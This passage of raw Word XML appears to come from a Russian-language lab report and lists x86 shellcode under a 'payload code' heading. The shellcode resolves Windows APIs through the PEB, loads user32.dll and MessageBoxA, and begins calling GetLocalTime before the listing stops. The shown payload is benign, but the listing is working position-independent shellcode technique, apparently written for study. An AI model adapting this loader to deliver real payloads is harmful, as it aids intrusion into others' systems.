        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1494" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0285412D" w14:textId="4D21FB57" w:rsidR="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1494" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB427F4" w14:textId="37B8F4E8" w:rsidR="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1494" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D98298B" w14:textId="77777777" w:rsidR="00A75863" w:rsidRDefault="00A75863" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1494" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3946614D" w14:textId="77777777" w:rsidR="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1494" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E8CBB8B" w14:textId="5DD8FE3D" w:rsidR="00FF1575" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Код полезной нагрузки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> на ассемблере </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C03B95C" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>0:  31 c9                   xor    ecx,ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EAC7A1" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>2:  f7 e1                   mul    ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF930BA" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>4:  64 8b 41 30             mov    eax,DWORD PTR fs:[ecx+0x30]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CEFCC0" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>8:  8b 40 0c                mov    eax,DWORD PTR [eax+0xc]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C33FE4" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>b:  8b 70 14                mov    esi,DWORD PTR [eax+0x14]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24770E7B" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>e:  ad                      lods   eax,DWORD PTR ds:[esi]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067359E2" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>f:  96                      xchg   esi,eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124BD45F" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>10: ad                      lods   eax,DWORD PTR ds:[esi]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021F0CDE" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>11: 8b 58 10                mov    ebx,DWORD PTR [eax+0x10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D57A4" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>14: 8b 53 3c                mov    edx,DWORD PTR [ebx+0x3c]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58583B38" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>17: 01 da                   add    edx,ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4C1DD" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>19: 8b 52 78                mov    edx,DWORD PTR [edx+0x78]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE120E" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>1c: 01 da                   add    edx,ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45376399" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>1e: 8b 72 20                mov    esi,DWORD PTR [edx+0x20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F4CD7A" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>21: 01 de                   add    esi,ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627BCCE9" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>23: 31 c9                   xor    ecx,ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4270EFC5" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>25: 41                      inc    ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AB2C57" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>26: ad                      lods   eax,DWORD PTR ds:[esi]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED0BBEE" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>27: 01 d8                   add    eax,ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C66763" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>29: 81 38 47 65 74 50       cmp    DWORD PTR [eax],0x50746547</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E792E35" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>2f: 75 f4                   jne    0x25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EEA104" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>31: 81 78 04 72 6f 63 41    cmp    DWORD PTR [eax+0x4],0x41636f72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A3D060" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>38: 75 eb                   jne    0x25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017DB604" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>3a: 81 78 08 64 64 72 65    cmp    DWORD PTR [eax+0x8],0x65726464</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBC6156" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>41: 75 e2                   jne    0x25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEF0EB0" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>43: 8b 72 24                mov    esi,DWORD PTR [edx+0x24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D135134" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>46: 01 de                   add    esi,ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391EF482" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>48: 66 8b 0c 4e             mov    cx,WORD PTR [esi+ecx*2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7396F70A" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>4c: 49                      dec    ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01903658" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>4d: 8b 72 1c                mov    esi,DWORD PTR [edx+0x1c]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14817D40" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>50: 01 de                   add    esi,ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AECB54" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>52: 8b 14 8e                mov    edx,DWORD PTR [esi+ecx*4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB3B02" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>55: 01 da                   add    edx,ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD383A9" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>57: 89 d5                   mov    ebp,edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6EAC42" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD32CD9" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>;getUser32+ getMessageBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6C8EF8" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>59: 31 c9                   xor    ecx,ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB5AFF5" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>5b: 51                      push   ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C517A" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>5c: 68 61 72 79 41          push   0x41797261</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333E7862" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>61: 68 4c 69 62 72          push   0x7262694c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D10E1" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>66: 68 4c 6f 61 64          push   0x64616f4c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9D7A4D" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>6b: 54                      push   esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3669D1D6" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>6c: 53                      push   ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A3CDDF" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>6d: ff d2                   call   edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D904B" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6835747F" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>6f: 68 6c 6c 61 61          push   0x61616c6c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C311AA" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>74: 66 81 6c 24 02 61 61    sub    WORD PTR [esp+0x2],0x6161</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07898552" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>7b: 68 33 32 2e 64          push   0x642e3233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC571B" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>80: 68 55 73 65 72          push   0x72657355</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5736891D" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>85: 54                      push   esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6237035C" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>86: ff d0                   call   eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7388DADA" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6440D5C1" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>88: 68 6f 78 41 61          push   0x6141786f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265530FF" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>8d: 66 83 6c 24 03 61       sub    WORD PTR [esp+0x3],0x61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D455EFC" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>93: 68 61 67 65 42          push   0x42656761</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5959B3CD" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>98: 68 4d 65 73 73          push   0x7373654d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61539989" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>9d: 54                      push   esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F360358" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>9e: 50                      push   eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B3A5C" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>9f: ff d5                   call   ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336AAAC6" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E262F1F" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="00BD4AE8" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD4AE8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1356">
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4AE8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">96 </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1356">
        <w:t>xchg</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4AE8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1356">
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4AE8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1356">
        <w:t>esi</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4AE8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ; на наше время сохраняем </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1356">
        <w:t>getMessageBox</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4AE8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1356">
        <w:t>esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA6CCA" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>;GetLocalTime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715C4185" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>a1: 31 c9                   xor    ecx,ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4A77BC" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>a3: 51                      push   ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E06134" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>a4: 68 54 69 6d 65          push   0x656d6954</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FDF61D" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>a9: 68 6f 63 61 6c          push   0x6c61636f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD77181" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>ae: 68 47 65 74 4c          push   0x4c746547</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2A39D5" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:lastRenderedPageBreak/>
        <w:t>b3: 54                      push   esp</w:t>
      </w:r>
    </w:p>
